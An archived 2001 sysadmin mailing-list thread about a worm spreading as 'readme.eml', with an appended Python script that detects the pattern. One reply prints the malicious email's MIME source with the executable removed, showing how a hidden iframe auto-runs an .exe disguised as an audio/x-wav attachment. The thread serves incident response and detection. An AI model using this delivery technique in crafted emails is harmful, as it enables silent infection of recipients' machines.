.eml is a sound file type.  If there's a sound embedded in a web page, it
executes (at least in IE).

isn't that special.

Dan

-----Original Message-----
From: Adam Meixler [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 2:36 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??


If it's like the one I've seen, it's an HTML mail that gets opened by
something like Outlook Express. The HTML mail has an attachment which it
calls from an iframe. The attachment is actually the exe which does the
infection. Here's the source of the eml, with the EXE (EA4DMGBP9p) taken
out:

MIME-Version: 1.0
Content-Type: multipart/related;
        type="multipart/alternative";
        boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
        boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe>
</BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
        name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>


--====_ABC1234567890DEF_====

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:24 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??


Stupid Ev Question #327: eml files can be executed? 
 
Thanks,
 
Evan
 
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:05 PM
To: NT System Admin Issues
Subject: RE: serious network down...readme.eml??
 
1    Unplug servers from network.
2    use ERD to recover.
3    send users home.
4    clean clients.
-----Original Message-----
From: Terry Manolakos [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 12:21 PM
To: NT System Admin Issues
Subject: serious network down...readme.eml??
My network is slammed with some unknown virus of some sort.....Both my NT 4.0
servers running MS-Exchange 6.5 have about 2300 alien files which were
deleted....a "readme.eml" is being executed by all users somehow
automatically and it's infecting all my NT domain.   I can not Ctrl+Alt+Delete
to log into any of the servers.....the display shows "initialization of the
dynamic link library C:\WINNT\system32\USER32.dll failed. The process is
terminating abnormally"  OKaying this results in no effects....all servers
have this displayed onscreen.  For the ones that have admin already logged
in, Services (control panel, settings) can not be accessed!  "access to the
specified device, path, or file is denied"....it seems this virus has locked
onto this element.  PDC is running Exchange (I know, never put'em
together...but we're still cleaning up after previous SysAdmins here), and
this has gone berserk as well, with the same message onscreen.
Norton/Symantec doesn't recognize "readme.eml"....who out there can shine a
flashlight in this dark mess?  thanks in advance.
Terry  
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
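
Added example, not part of the thread: a Python check for the structure Adam describes above, an attachment declared as audio/x-wav but named readme.exe and pulled in by an iframe through its Content-ID. The sample message is constructed with a harmless placeholder body and flattened nesting; the extension list, tag list and the function name scan_eml are assumptions.

```python
import email
import re
from email import policy

# Constructed sample with the structure quoted in the thread (nesting flattened);
# the base64 body is the word "placeholder", not the original attachment.
SAMPLE = b"""MIME-Version: 1.0
Content-Type: multipart/related; boundary="====_ABC1234567890DEF_===="

--====_ABC1234567890DEF_====
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

cGxhY2Vob2xkZXI=
--====_ABC1234567890DEF_====--
"""

EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs")  # assumed list
# Tags that fetch their source without a click, pointing at a cid: part.
CID_REF = re.compile(
    r"<(?:iframe|frame|embed|object|bgsound)\b[^>]*?\b(?:src|data)\s*=\s*[\"']?cid:([^\s\"'>]+)",
    re.I)

def scan_eml(raw):
    """Return one finding per MIME part whose name ends in an executable extension."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    auto_cids = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            auto_cids.update(CID_REF.findall(part.get_content()))  # QP already decoded
    findings = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()  # falls back to Content-Type name=
        if name.endswith(EXEC_EXT):
            cid = str(part.get("Content-ID", "")).strip("<> ")
            findings.append({"filename": name, "declared_type": part.get_content_type(),
                             "type_mismatch": part.get_content_maintype() in ("audio", "image", "video"),
                             "auto_loaded": cid in auto_cids})
    return findings
```

A finding with both type_mismatch and auto_loaded set is the pattern from the thread; either flag alone is still worth quarantining at the mail gateway.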